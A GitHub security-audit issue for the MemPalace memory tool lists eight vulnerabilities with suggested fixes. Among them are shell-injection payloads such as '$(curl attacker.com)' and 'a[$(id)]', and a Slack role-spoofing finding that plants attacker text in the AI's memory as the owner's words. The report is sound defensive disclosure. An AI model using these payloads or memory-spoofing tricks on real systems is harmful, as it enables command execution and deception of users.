
Security Audit: 8 unreported vulnerabilities — data leakage, shell injection, file permissions #809

@Kesshite

Security Audit Report

Hi Milla, Ben, and the MemPalace community!

I ran a full security audit on the v3.2.0 codebase (commit 6614b9b, develop branch) before deploying MemPalace in my own workflow. I found 8 previously unreported vulnerabilities that I'd like to flag — and I'm happy to submit PRs for all of them.

I checked existing issues and PRs before filing this. #401 (security hardening RFC), #477 (search limit), #438 (precompact session_id + regex escape), and #782 (ChromaDB telemetry) cover related ground, but none of them addresses the findings below.


CRITICAL

1. Wikipedia SSRF in entity_registry.py — violates local-first guarantee

File: mempalace/entity_registry.py, lines 176–257

_wikipedia_lookup() makes an outbound HTTPS GET to https://en.wikipedia.org/api/rest_v1/page/summary/{word} whenever research() is called. This is in the core package, not a benchmark or optional module.

  • Any entity name extracted during mining gets sent to Wikipedia
  • User's IP is disclosed to Wikipedia (and any network observer)
  • Directly violates CLAUDE.md: "Privacy by architecture — The system physically cannot send your data because it never leaves your machine"

Additionally, if Wikipedia returns 404, the word is classified as "person" with 0.70 confidence (lines 246–254), which poisons the entity registry with false positives.

Suggested fix: Make research() local-only by default. Require explicit allow_network=True opt-in for Wikipedia lookups, and return "unknown" with low confidence on 404 instead of asserting person.
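
A minimal sketch of that opt-in behaviour, not the project's actual code. The signature, the return shape, and the `lookup` parameter are hypothetical: `lookup` stands in for _wikipedia_lookup() and is assumed to return a dict on success or None on a 404.

```python
from typing import Callable, Optional

# Hypothetical type: a callable standing in for _wikipedia_lookup(),
# assumed to return a dict on success or None when Wikipedia answers 404.
Lookup = Callable[[str], Optional[dict]]


def research(word: str, allow_network: bool = False,
             lookup: Optional[Lookup] = None) -> dict:
    """Classify a word without touching the network unless explicitly allowed."""
    if not allow_network or lookup is None:
        # Default path: nothing leaves the machine.
        return {"word": word, "type": "unknown", "confidence": 0.0}

    summary = lookup(word)
    if summary is None:
        # A 404 only means "no article"; it says nothing about personhood.
        return {"word": word, "type": "unknown", "confidence": 0.1}

    return {"word": word,
            "type": summary.get("type", "unknown"),
            "confidence": summary.get("confidence", 0.5)}
```

Injecting the lookup as a parameter also lets tests assert that the default path never calls it.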


2. Shell injection via eval in mempal_save_hook.sh: stop_hook_active not sanitized

File: hooks/mempal_save_hook.sh, lines 68–80

The save hook uses eval to parse Python output into shell variables. The stop_hook_active field is not passed through the safe() lambda (unlike session_id and transcript_path):

eval $(echo "$INPUT" | python3 -c "
...
safe = lambda s: re.sub(r'[^a-zA-Z0-9_/.\-~]', '', str(s))
print(f'SESSION_ID=\"{safe(sid)}\"')
print(f'STOP_HOOK_ACTIVE=\"{sha}\"')       # ← NOT sanitized
print(f'TRANSCRIPT_PATH=\"{safe(tp)}\"')
")

If the JSON input contains "stop_hook_active": "$(curl attacker.com)", bash will execute the command substitution inside eval.

Suggested fix: Validate stop_hook_active is strictly True or False before printing:

sha_raw = data.get('stop_hook_active', False)
sha = 'True' if sha_raw is True or str(sha_raw).lower() in ('true', '1') else 'False'
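
The same check can be written as a standalone function for testing. This is a sketch under assumptions: `normalize_flag` and `shell_assignment` are hypothetical helper names, and quoting the value with `shlex.quote` is an extra defence-in-depth step that the hook does not currently take.

```python
import json
import shlex


def normalize_flag(raw: object) -> str:
    """Collapse any JSON value to the literal string 'True' or 'False'."""
    if raw is True or str(raw).lower() in ("true", "1"):
        return "True"
    return "False"


def shell_assignment(name: str, value: str) -> str:
    """Emit NAME=value with the value quoted so the shell will not expand it."""
    return f"{name}={shlex.quote(value)}"


# A hostile payload collapses to 'False' before it ever reaches eval.
payload = json.loads('{"stop_hook_active": "$(curl attacker.com)"}')
flag = normalize_flag(payload.get("stop_hook_active", False))
print(shell_assignment("STOP_HOOK_ACTIVE", flag))
```

Because the output can only be one of two fixed strings, nothing attacker-controlled reaches the shell, whatever the JSON contains.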

3. transcript_path from stdin opens arbitrary files in hooks_cli.py

File: mempalace/hooks_cli.py, lines 42–77, 124–126

transcript_path is read from the stdin JSON and passed to _count_human_messages(), which calls Path(transcript_path).expanduser() and opens the file. Nothing checks that the path stays inside the expected Claude Code sessions directory, so the hook will open any file its user can read.

Suggested fix: Validate the resolved path is under the expected root (e.g., ~/.claude/projects) and has a .jsonl/.json extension before opening.
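
One way the containment check might look. `is_allowed_transcript` and `ALLOWED_SUFFIXES` are hypothetical names, and the default root is the example directory mentioned above, not a confirmed location.

```python
from pathlib import Path

ALLOWED_SUFFIXES = {".jsonl", ".json"}


def is_allowed_transcript(transcript_path: str,
                          root: str = "~/.claude/projects") -> bool:
    """Return True only for .json/.jsonl paths that resolve inside root."""
    root_resolved = Path(root).expanduser().resolve()
    # resolve() collapses ../ components and follows symlinks, so the
    # comparison is made on the real location, not the spelling of the path.
    candidate = Path(transcript_path).expanduser().resolve()
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        return False
    try:
        candidate.relative_to(root_resolved)
    except ValueError:
        return False  # the resolved path lies outside the allowed root
    return True
```

Resolving both paths before comparing matters: a plain string prefix check would accept `~/.claude/projects/../../.ssh/id_rsa.json`.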


HIGH

4. Arithmetic injection in mempal_save_hook.sh

File: hooks/mempal_save_hook.sh, lines 120–124

LAST_SAVE=$(cat "$LAST_SAVE_FILE")
SINCE_LAST=$((EXCHANGE_COUNT - LAST_SAVE))

LAST_SAVE is read from a state file and used directly in $((...)) without checking that it is an integer. Bash arithmetic expansion evaluates a variable's contents as an expression, so a value such as a[$(id)] runs the embedded command substitution.

Suggested fix:

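LAST_SAVE=0
LAST_SAVE_RAW=$(cat "$LAST_SAVE_FILE" 2>/dev/null)
if [[ "$LAST_SAVE_RAW" =~ ^[0-9]+$ ]]; then
    LAST_SAVE=$((10#$LAST_SAVE_RAW))  # force base 10 so "08" is not parsed as octal
fi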

MEDIUM

5. File permissions — 6 locations create sensitive files world-readable

On Linux with default umask (022), these files are created 644/755 (world-readable):

Location | Path | What's exposed
hooks_cli.py:84 | ~/.mempalace/hook_state/ | Session IDs, timestamps
entity_registry.py:311 | entity_registry.json | Names of all people, relationships, aliases
knowledge_graph.py:53 | knowledge_graph.sqlite3 | Every temporal fact ever stored
exporter.py:51 | export output directory | Complete verbatim memory palace
config.py:227 | people_map.json | Name mappings for all people
mcp_server.py:92 | WAL file (TOCTOU race) | Write audit log

Suggested fix: Apply chmod(0o700) to directories and chmod(0o600) to files immediately after creation, with try/except (OSError, NotImplementedError): pass for Windows compatibility.
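
A sketch of helpers that could back this fix. `make_private_dir` and `write_private_file` are hypothetical names. For files, the sketch passes the mode to `os.open()` at creation time instead of relying only on a later chmod, which is a variation on the suggestion above: it closes the short window in which a new file would otherwise be world-readable.

```python
import os
from pathlib import Path


def make_private_dir(path) -> Path:
    """Create a directory (and parents), then restrict the leaf to its owner."""
    directory = Path(path)
    directory.mkdir(parents=True, exist_ok=True)
    try:
        os.chmod(directory, 0o700)
    except (OSError, NotImplementedError):
        pass  # e.g. platforms where POSIX modes are not fully supported
    return directory


def write_private_file(path, data: str) -> None:
    """Write text to a file that is owner-only from the moment it is created."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w", encoding="utf-8") as handle:
        try:
            os.chmod(path, 0o600)  # also tightens a file that already existed
        except (OSError, NotImplementedError):
            pass
        handle.write(data)
```

SQLite databases are created by the `sqlite3` module, not by `open()`, so for knowledge_graph.sqlite3 a chmod after connecting (or a restrictive umask around the connect call) would still be needed.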


6. Slack transcript role spoofing in normalize.py

File: mempalace/normalize.py, lines 276–306

The Slack JSON parser assigns "user" to the first speaker and "assistant" to the second, purely by position. A crafted Slack export where an attacker's message is first gets stored with role "user", making attacker-written text appear as the memory owner's own words in all future retrieval.

Suggested fix: Label Slack-sourced transcripts with a provenance header indicating multi-party chat origin, and don't assign user/assistant roles to arbitrary speakers.
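
A rough sketch of role-free normalization. The function name, the header text, and the output layout are all hypothetical, and the sketch assumes each message is a dict with "type", "user", and "text" keys, as in standard Slack exports. The real parser in normalize.py may expect a different shape.

```python
from typing import Dict, List

# Hypothetical marker telling downstream consumers not to treat any
# speaker in this transcript as the memory owner.
PROVENANCE_HEADER = "[source: slack export | multi-party chat | speakers unverified]"


def normalize_slack_messages(messages: List[Dict]) -> str:
    """Render messages under their own speaker IDs instead of user/assistant."""
    lines = [PROVENANCE_HEADER]
    for msg in messages:
        if msg.get("type", "message") != "message":
            continue  # skip non-message events
        speaker = str(msg.get("user") or msg.get("username") or "unknown")
        text = str(msg.get("text", "")).strip()
        if text:
            lines.append(f"<{speaker}> {text}")
    return "\n".join(lines)
```

Keeping the original speaker identifier means message order no longer decides who is treated as the memory owner.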


7. palace_path from env var not normalized

File: mempalace/config.py, lines 143–148

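MEMPALACE_PALACE_PATH from the environment is used as-is, without os.path.abspath() or expanduser(). This differs from the --palace CLI arg (which gets abspath at mcp_server.py:62). A relative value, or one with ../ components, is resolved against whatever the current working directory happens to be, and a leading ~ is never expanded, so palace storage can end up somewhere unintended.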

Suggested fix: Apply os.path.abspath(os.path.expanduser(env_val)) in the config loader.
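
As a sketch, the normalization could live in one small function. `palace_path_from_env` is a hypothetical name, and returning None when the variable is unset is an assumption about how the config loader falls back to its default.

```python
import os
from typing import Mapping, Optional


def palace_path_from_env(environ: Mapping[str, str] = os.environ) -> Optional[str]:
    """Return MEMPALACE_PALACE_PATH as an absolute path, or None if unset."""
    raw = environ.get("MEMPALACE_PALACE_PATH")
    if not raw:
        return None
    # expanduser() handles a leading ~; abspath() anchors relative paths to
    # the current directory and collapses ../ components.
    return os.path.abspath(os.path.expanduser(raw))
```

Note that abspath() only normalizes the path. It does not restrict where the palace may live, so any containment policy would be a separate check.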


8. Date fields in KG tools not validated

File: mempalace/mcp_server.py, line 748; knowledge_graph.py, lines 219–242

as_of, valid_from, valid_to parameters from MCP calls reach SQLite without format validation. While parameterized queries prevent SQL injection, invalid date strings silently break temporal filtering (queries return empty results instead of matching facts).

Suggested fix: Add an ISO-8601 date format validator at the MCP boundary:

_DATE_RE = re.compile(r'^\d{4}-(?:0[1-9]|1[0-2])(?:-(?:0[1-9]|[12]\d|3[01]))?$')
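
The pattern above checks shape only, so it accepts impossible dates such as 2023-02-31. With re.match, the trailing `$` also tolerates a final newline. A hedged sketch of a stricter validator follows. `is_valid_kg_date` is a hypothetical name, and accepting both YYYY-MM and YYYY-MM-DD is carried over from the regex.

```python
import re
from datetime import date

# Same shape as the suggested pattern, with capture groups and ASCII-only
# digits; fullmatch() below rejects trailing newlines.
_DATE_RE = re.compile(r'([0-9]{4})-(0[1-9]|1[0-2])(?:-(0[1-9]|[12][0-9]|3[01]))?')


def is_valid_kg_date(value: object) -> bool:
    """Accept YYYY-MM or YYYY-MM-DD strings that name a real calendar date."""
    if not isinstance(value, str):
        return False
    match = _DATE_RE.fullmatch(value)
    if match is None:
        return False
    year, month = int(match.group(1)), int(match.group(2))
    day = int(match.group(3) or 1)  # YYYY-MM is checked as the first of the month
    try:
        date(year, month, day)
    except ValueError:
        return False  # e.g. 31 February, or year 0000
    return True
```

Rejecting bad values at the MCP boundary turns a silently empty result into an explicit error the caller can act on.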

Relationship to existing issues/PRs

Next steps

I'm happy to submit focused PRs for each finding, targeting develop:

  • fix/security-wikipedia-ssrf — Finding 1
  • fix/security-hook-injection — Findings 2, 3, 4
  • fix/security-file-permissions — Finding 5
  • fix/security-normalize-roles — Finding 6
  • fix/security-config-validation — Findings 7, 8

Let me know if you'd prefer a different grouping or if any of these are already being worked on internally.

Thanks for building MemPalace — it's a great project and I want to help make it solid.
